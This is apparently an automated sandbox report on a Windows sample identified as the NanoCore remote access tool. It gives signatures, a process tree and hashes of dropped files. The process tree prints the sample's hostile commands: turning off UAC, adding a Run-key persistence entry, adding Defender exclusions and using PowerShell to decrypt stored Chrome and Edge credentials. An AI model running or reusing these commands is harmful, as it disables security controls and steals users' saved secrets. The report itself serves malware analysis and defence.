Analysis

  • max time kernel
    33s
  • max time network
    36s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-11-2024 21:22

General

  • Target

    Launcher.exe

  • Size

    37.9MB

  • MD5

    2879823979f8b16f80483eb80f38dcaa

  • SHA1

    83846ac4df07519a2fab9952d43ee9be2fdb5794

  • SHA256

    15455df49778d6e1154d788f37171e2e73abc52db4c0b78cde050ad054a23bf7

  • SHA512

    3470ac73d739c805d52ed452bc463f92977d8b606fd4f83e0aab9546e01d55bac27e9faffb20d3f617b6f48476296588e354453d74a32459225c22d716a205b2

  • SSDEEP

    786432:YRrD3/04fhQJc9LUwSwLzL60o48fyEodlWPy1WGTO7icRS7:YRrT04yJzwR60v8fyEoqPyjt

Malware Config

Signatures

  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Nanocore family
  • UAC bypass 3 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 25 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 41 IoCs
  • Suspicious use of SendNotifyMessage 41 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3036
    • C:\ProgramData\app.exe
      "C:\ProgramData\app.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:624
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\PyEz9teIqZ.ps1""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3384
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\PyEz9teIqZ.ps1"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2584
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xc4b4an4\xc4b4an4.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1648
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCAD2.tmp" "c:\Users\Admin\AppData\Local\Temp\xc4b4an4\CSC494ABE77D2334C0D91624C649598BB13.TMP"
              6⤵
                PID:2060
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4760
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic diskdrive get serialnumber
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4400
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "tasklist"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2756
          • C:\Windows\system32\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3236
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "tasklist"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1504
          • C:\Windows\system32\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3528
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,129,16,73,93,74,164,203,65,182,117,126,178,71,44,110,81,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,164,116,187,42,169,65,115,97,219,49,37,208,128,127,105,73,241,132,95,93,215,30,2,158,91,166,71,223,77,32,129,179,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,245,156,200,243,26,139,147,183,234,188,125,196,88,247,5,179,82,87,136,238,102,232,32,84,159,204,88,87,76,126,165,121,48,0,0,0,174,213,17,235,90,208,184,10,204,58,215,134,9,45,164,76,97,12,3,229,87,60,220,26,154,199,7,93,64,125,95,226,186,21,165,117,250,194,88,181,180,70,5,126,248,225,118,90,64,0,0,0,247,121,11,8,160,209,43,107,210,107,62,185,249,57,132,197,41,152,160,172,160,161,105,255,178,201,87,103,41,95,249,36,248,222,112,11,165,255,10,145,205,227,31,246,100,142,106,5,213,230,141,211,242,169,127,91,29,216,27,195,134,91,44,130), $null, 'CurrentUser')"
          3⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • Suspicious use of WriteProcessMemory
          PID:1908
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,129,16,73,93,74,164,203,65,182,117,126,178,71,44,110,81,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,164,116,187,42,169,65,115,97,219,49,37,208,128,127,105,73,241,132,95,93,215,30,2,158,91,166,71,223,77,32,129,179,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,245,156,200,243,26,139,147,183,234,188,125,196,88,247,5,179,82,87,136,238,102,232,32,84,159,204,88,87,76,126,165,121,48,0,0,0,174,213,17,235,90,208,184,10,204,58,215,134,9,45,164,76,97,12,3,229,87,60,220,26,154,199,7,93,64,125,95,226,186,21,165,117,250,194,88,181,180,70,5,126,248,225,118,90,64,0,0,0,247,121,11,8,160,209,43,107,210,107,62,185,249,57,132,197,41,152,160,172,160,161,105,255,178,201,87,103,41,95,249,36,248,222,112,11,165,255,10,145,205,227,31,246,100,142,106,5,213,230,141,211,242,169,127,91,29,216,27,195,134,91,44,130), $null, 'CurrentUser')
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4528
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,129,16,73,93,74,164,203,65,182,117,126,178,71,44,110,81,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,139,149,61,22,143,208,165,197,251,123,169,210,55,219,148,113,165,181,91,154,157,197,12,55,51,111,165,149,72,78,237,230,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,213,153,171,134,150,145,222,15,139,172,47,244,46,116,201,210,254,92,188,199,93,217,118,211,78,85,206,8,179,42,144,37,48,0,0,0,59,229,32,183,146,197,76,162,43,149,77,99,91,70,22,3,32,131,150,80,172,96,181,205,177,235,161,169,187,158,71,242,89,118,199,212,124,47,217,10,178,61,94,160,223,255,89,165,64,0,0,0,208,96,221,169,23,218,255,248,232,171,138,90,122,41,178,31,54,183,175,178,212,152,53,7,131,216,218,78,238,248,23,250,90,143,245,171,92,163,243,249,126,109,209,117,176,98,2,218,130,34,93,191,120,231,38,237,14,201,175,171,85,186,175,100), $null, 'CurrentUser')"
          3⤵
          • An obfuscated cmd.exe command-line is typically used to evade detection.
          • Suspicious use of WriteProcessMemory
          PID:2036
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,129,16,73,93,74,164,203,65,182,117,126,178,71,44,110,81,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,139,149,61,22,143,208,165,197,251,123,169,210,55,219,148,113,165,181,91,154,157,197,12,55,51,111,165,149,72,78,237,230,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,213,153,171,134,150,145,222,15,139,172,47,244,46,116,201,210,254,92,188,199,93,217,118,211,78,85,206,8,179,42,144,37,48,0,0,0,59,229,32,183,146,197,76,162,43,149,77,99,91,70,22,3,32,131,150,80,172,96,181,205,177,235,161,169,187,158,71,242,89,118,199,212,124,47,217,10,178,61,94,160,223,255,89,165,64,0,0,0,208,96,221,169,23,218,255,248,232,171,138,90,122,41,178,31,54,183,175,178,212,152,53,7,131,216,218,78,238,248,23,250,90,143,245,171,92,163,243,249,126,109,209,117,176,98,2,218,130,34,93,191,120,231,38,237,14,201,175,171,85,186,175,100), $null, 'CurrentUser')
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4580
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4388
          • C:\Windows\system32\reg.exe
            reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
            4⤵
            • UAC bypass
            PID:4000
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4316
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic diskdrive get serialnumber
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4048
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v app /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4832
          • C:\Windows\system32\reg.exe
            reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v app /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
            4⤵
            • Adds Run key to start application
            PID:1688
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.al0VX5V4rH""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1324
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.al0VX5V4rH"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2572
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:776
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:1984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2608
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic baseboard get serialnumber
            4⤵
              PID:2764
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2060
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic baseboard get serialnumber
              4⤵
                PID:4808
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
              3⤵
                PID:4864
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
                3⤵
                  PID:4180
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic path win32_computersystemproduct get uuid
                    4⤵
                      PID:836
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
                    3⤵
                      PID:3120
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic PATH Win32_VideoController GET Description,PNPDeviceID
                        4⤵
                          PID:4448
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
                        3⤵
                          PID:808
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic memorychip get serialnumber
                            4⤵
                              PID:1468
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
                            3⤵
                              PID:4468
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic csproduct get uuid
                                4⤵
                                  PID:2364
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
                                3⤵
                                  PID:1916
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic cpu get processorid
                                    4⤵
                                      PID:224
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
                                    3⤵
                                      PID:2392
                                      • C:\Windows\system32\getmac.exe
                                        getmac /NH
                                        4⤵
                                          PID:184
                                      • C:\Users\Admin\AppData\Local\Temp\python-installer.exe
                                        C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
                                        3⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:4876
                                        • C:\Windows\Temp\{7119ADAA-B885-4190-B9E2-AAD3314F5C5B}\.cr\python-installer.exe
                                          "C:\Windows\Temp\{7119ADAA-B885-4190-B9E2-AAD3314F5C5B}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=680 -burn.filehandle.self=636 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
                                          4⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Adds Run key to start application
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry class
                                          PID:1652
                                    • C:\ProgramData\App2.exe
                                      "C:\ProgramData\App2.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Checks whether UAC is enabled
                                      • Drops file in Program Files directory
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious behavior: GetForegroundWindowSpam
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4952
                                  • C:\Windows\system32\msiexec.exe
                                    C:\Windows\system32\msiexec.exe /V
                                    1⤵
                                    • Blocklisted process makes network request
                                    • Enumerates connected drives
                                    • Drops file in Windows directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4380
                                  • C:\Windows\system32\taskmgr.exe
                                    "C:\Windows\system32\taskmgr.exe" /4
                                    1⤵
                                    • Checks SCSI registry key(s)
                                    • Modifies registry class
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:3516
                                  • C:\Windows\System32\rundll32.exe
                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    1⤵
                                      PID:2512

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Config.Msi\e57e5bf.rbs

                                      Filesize

                                      8KB

                                      MD5

                                      480305b10f1fe8d50fa8224c86776e09

                                      SHA1

                                      47f67a01ed109f647264384547bb9e17140fed94

                                      SHA256

                                      2685fe16b1fb75583611204bff91d29276f1456ee1f59a2db99a143b44232f1b

                                      SHA512

                                      872c8580c6bc7316ba0310a6474183beded60690e244a4599f7800b72d61fdd9ae492eade4dec19b417b1b9cbb9c6cf6606d871a64d4839a80ce3f421804b1b7

                                    • C:\Config.Msi\e57e5c4.rbs

                                      Filesize

                                      12KB

                                      MD5

                                      74e6efe7536db1ec4e2d9ca03bc19dbc

                                      SHA1

                                      319629c3194039284b906b2762e8061a9245d686

                                      SHA256

                                      9c53e57ed8dd0fd3ad8d13e2bc8caedd8b0be09d8e8386dccb9fbb818bf5cc54

                                      SHA512

                                      a12de06d2513ca6f2bddf1e8251855e38f4a59676828bfb56b45ac014c8cdbe1b2b282b44a563dbaa2e7bc3f3262e50b4292b64fcf7f0986fe3de5a5d9c5d9bb

                                    • C:\Config.Msi\e57e5c9.rbs

                                      Filesize

                                      50KB

                                      MD5

                                      e4d3f3816e1a9197a8de8642308c500b

                                      SHA1

                                      64bae953f24a6bf50fb975cf04f6599aa905face

                                      SHA256

                                      474131d27a3760b267956702d28c98c8fefe6a2dc8d07d04e1ecc2f3e9eb4459

                                      SHA512

                                      8ba7a71cd38fd5cd7ea5c64057228562f54df8fdba1b81db073d16e51a7d94abc6ea4d363d0f336251f52be2f38afac1c943ca89a7a690398f050f57bd40dbf2

                                    • C:\Config.Msi\e57e5ce.rbs

                                      Filesize

                                      138KB

                                      MD5

                                      f4239cce2c5a677cbbb776ea4098978d

                                      SHA1

                                      6e8797f42d0ed8e73908802ea3720d3c649bdf48

                                      SHA256

                                      0f12a7844854bb115a80d0c054215c6adc7b4a66456a07970b5b1bc439de3a8b

                                      SHA512

                                      fd17ba1fb697db0e4f1075017f078f8c6f9b8f76c44f17ac2e86b13dfb48415d3a1f971ed8c618c0a5701172230c4db75a6c592da8e29b0a5b476ef46f2ace96

                                    • C:\ProgramData\App2.exe

                                      Filesize

                                      202KB

                                      MD5

                                      73f5733f76ac052b15335c1cd985f73f

                                      SHA1

                                      8c4be16301b9da6caa774f800104adf5731b55a4

                                      SHA256

                                      9cf5e2e0f424e7d3b206b17c262a538b29776c34b3fe11fa38222ce8cf7eaff3

                                      SHA512

                                      7acda28d83caf6f27535c0e5e465b6219ba178ad673b0e4af517894c537dd50b7f16d3e83b3ddb7c8c268835eb9fd962902b38e51083a35d0c778aa1600349f5

                                    • C:\ProgramData\Steam\Launcher\0YaoWDXU8dfY\EN-Ofgaduse\debug.log

                                      Filesize

                                      1KB

                                      MD5

                                      8cb91054f74f653adea494b1c3261e12

                                      SHA1

                                      ed9f662abd1865c35ff0aae0ea69e6c0b5816ba6

                                      SHA256

                                      f2a7dc135517fc38fa946854b7da77ff3f77f21e460484cbddaa3bf227dec55b

                                      SHA512

                                      1285005643effd19c4732715c0a269227fa23e742330e18be0fd2fc9413d3ef6f6e529b8fbfed8c00241f9b6ba7af69921cdbebc7da943b81a25b195ae4689fb

                                    • C:\ProgramData\Update.vbs

                                      Filesize

                                      90B

                                      MD5

                                      d8d3ea565a50d8e8ba7c2b300cf044de

                                      SHA1

                                      a6d7f1a4f7ea562c66652fcf09d7746e907b0c76

                                      SHA256

                                      14c92ac3eec41837fb48148d2ada304f409ae93eb97fbb13243b315b208e178d

                                      SHA512

                                      11298187153aff223ea27d7d7eb45a3c087e4bdacd11640db16a23055df88756825ae20dc6ac21b57e7017effa31d78448ce272b3279c05d94c142dbdce72250

                                    • C:\ProgramData\app.exe

                                      Filesize

                                      37.7MB

                                      MD5

                                      2b4e3d8483a38b3edb8c5fb6c4ae2377

                                      SHA1

                                      97b61d68ecb640b9c80417b6c5ee3940c1d4807f

                                      SHA256

                                      0bb4106d06534f26e4b1b74627129c7b614339cc9b0eb948200ae739f38321cb

                                      SHA512

                                      737deffa13732a97baa95809b3aa226580c21ad7ceb17ed245244ff7cda0db0e1f0a01a5a9966ea9867b3ef4c6c234b3be76bc90f5bb78c454dc458ced158ba0

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                      Filesize

                                      2KB

                                      MD5

                                      2f57fde6b33e89a63cf0dfdd6e60a351

                                      SHA1

                                      445bf1b07223a04f8a159581a3d37d630273010f

                                      SHA256

                                      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                      SHA512

                                      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      ae89297f3393ee4761ca9c14e717ac03

                                      SHA1

                                      72ed2f789d59cb746c2718d41e07d22f49594d0f

                                      SHA256

                                      222d486a032a94569ab9f9c0cd6832b85a82f2f2862eb9c24c8ae5abfec0d9de

                                      SHA512

                                      8626d514a5017ed77df7a25f5531bfd0252865a35da1006580259cedb9c14c5c63e9eb39d4ed7f08aed5cdb3dfd54d8a767de0dba91541b06cb5b950b0fb3156

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      e86a2f4d6dec82df96431112380a87e6

                                      SHA1

                                      2dc61fae82770528bee4fe5733a8ac3396012e79

                                      SHA256

                                      dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a

                                      SHA512

                                      5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      e7e8f780c9a43989c0f21330109d43cc

                                      SHA1

                                      132ca5e62b2785ee7d8fef4ab52147227ce16673

                                      SHA256

                                      3b87e21fd90a48a668a5a618b7ba881b866ddbcdfee1f45156f8f766c4ed5420

                                      SHA512

                                      72c53c59a2818410159dad125b409fd4f092e8a3b0a9f00c4c720ec9ebde564eea2ce9b30f2ec531eee1c441ffba3b38d0b65ea180771c37c4a62f4e82bfaafa

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      87fb866432ac7566ff2c238b2aca1f1c

                                      SHA1

                                      19d2610c9fecce07e847454fad6d0f16d6466893

                                      SHA256

                                      928f219248c3c93d189827cd65aa6fefc20674ed2927feccc129c41f210579e6

                                      SHA512

                                      c25c92f6792a219c5b9f430ec739b27c25a36f385b757abd0d47a682e53af6c7dc8441c4e1b3440ae682c0ea31138275bcadec16e7c870de225a921335d6ef96

                                    • C:\Users\Admin\AppData\Local\Package Cache\.unverified\lib_JustForMe

                                      Filesize

                                      7.1MB

                                      MD5

                                      f6ddadd0d817ce569e202e57863ae919

                                      SHA1

                                      3a2f6d81c895f573464d378ab3bcfb6d8a48eaf2

                                      SHA256

                                      63032d6386c94e83a3b7b7b9eefc23493f976bd435a10668aa263d1ca1cb22e1

                                      SHA512

                                      7d970e62e3b513b2fa98e8a83ce3080fc6652bba2b70a5127a46ca5c2b0dee8790e48fffef56d15bec2706a997ade5a3c05ff5df4c6be2b3632b6bf7aa6e9ef2

                                    • C:\Users\Admin\AppData\Local\Package Cache\.unverified\tcltk_JustForMe

                                      Filesize

                                      3.4MB

                                      MD5

                                      fd7e13f2c36fe528afc7a05892b34695

                                      SHA1

                                      14a9c4dfd12e1f9b1e64e110166500be1ef0abb1

                                      SHA256

                                      2a24729e58bce7c2abde7225dc2de32539b4c4ef3609b53b54f643955d01c4b0

                                      SHA512

                                      7b7060672f680c418f7ebbddf2ba693539b1284566ab756c8061b61a582d13537aa215dad03db5c803eeba2f6fcc7fad7ed2857931ea205048abd905afef1d4f

                                    • C:\Users\Admin\AppData\Local\Package Cache\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}v3.12.6150.0\dev.msi

                                      Filesize

                                      384KB

                                      MD5

                                      dc49359c176d731fef03fc51ed13c959

                                      SHA1

                                      3d9348460f2300faeefe1e1e3787c55e71ff0aad

                                      SHA256

                                      04f38bdd910eabe114dde5e321cdcbf831c6373da9d27d791b96e09cd96f5417

                                      SHA512

                                      5044e4b30919e0d30502162539069014fcf2a4061f9a75a1956202231d98eba985fa7234694f70fae7d3defde2f9f41e97e821e74bda66107a9f452002768793

                                    • C:\Users\Admin\AppData\Local\Package Cache\{537B2AF5-504B-4303-99CB-FDE56F47AA51}v3.12.6150.0\exe.msi

                                      Filesize

                                      724KB

                                      MD5

                                      2db9e147e0fd938c6d3c1e7cf6942496

                                      SHA1

                                      e4333f4334b5df6f88958e03ad18b54e64a1331f

                                      SHA256

                                      9f3fc998d3ef429818a8047a43aad89f2d88c190385ba5ac57124132acda9eab

                                      SHA512

                                      4b9cbbf2d26cab8be365671d91c7f95216e90a9de30b87224228d1ab5db64a888fbf0b552d259dc5552d2da28451a394c227da312c73807a9c69fe6edfa3cbc8

                                    • C:\Users\Admin\AppData\Local\Package Cache\{901B913C-FA63-48D2-9842-7D7676739378}v3.12.6150.0\core.msi

                                      Filesize

                                      1.9MB

                                      MD5

                                      d4c1f834f30032f220409a17e0f688cd

                                      SHA1

                                      61dc90b164c3797456a8ed775b353a087054fd0f

                                      SHA256

                                      675c023e78eaed980638a969feaaa07c52a5a604d89e81434e6c462f17eebc12

                                      SHA512

                                      b7e97a5fab185b5d9150e07e1707aca21285ae62d4a25997040349eab78a2ad2f9a555980bb221a3a91120651c04a5df0909387e8931e76094de41f7697b124f

                                    • C:\Users\Admin\AppData\Local\Temp\PyEz9teIqZ.ps1

                                      Filesize

                                      380B

                                      MD5

                                      cbb9a56c9c8d7c3494b508934ace0b98

                                      SHA1

                                      e76539db673cc1751864166494d4d3d1761cb117

                                      SHA256

                                      027703af742d779f4dcde399ac49a3334f1b9e51b199215203e1f4b5e3251fe5

                                      SHA512

                                      f71e0a521c2b0aa034e0a2c9f0efd7d813d8408d118979f8e05ecd3aa6fb94c67793e2302ed9455aad9a63d43a53fa1ac2b3d45f7bdfa1cc8104c9a9ace84129

                                    • C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241107212302_000_core_JustForMe.log

                                      Filesize

                                      3KB

                                      MD5

                                      258281d9a124d66552580a0293659942

                                      SHA1

                                      a82b8e2e273fa57e8b3538920e830f6c5f33ea8f

                                      SHA256

                                      ac6932db01d3d262c3a6f1be2f7c69c58b96d29244af22d6c21cdbc40d290230

                                      SHA512

                                      d40ab74b2bb51181b349b8c790b4adf6af8405929667287d342eab6068373f983db95f5034294ae1839a553a3f3ad2516cdfda7becc8603400e1a1a225edf56b

                                    • C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241107212302_001_exe_JustForMe.log

                                      Filesize

                                      1KB

                                      MD5

                                      c29fcdadcf8b0ffe1a235106fc3a39b1

                                      SHA1

                                      efd2f41dcbedf9f92fd030c1c3fad2ef862791f3

                                      SHA256

                                      7c1f1434a7c8d293cf8c1318548eb8cfdeb395bed563d2653eb52af95982cefe

                                      SHA512

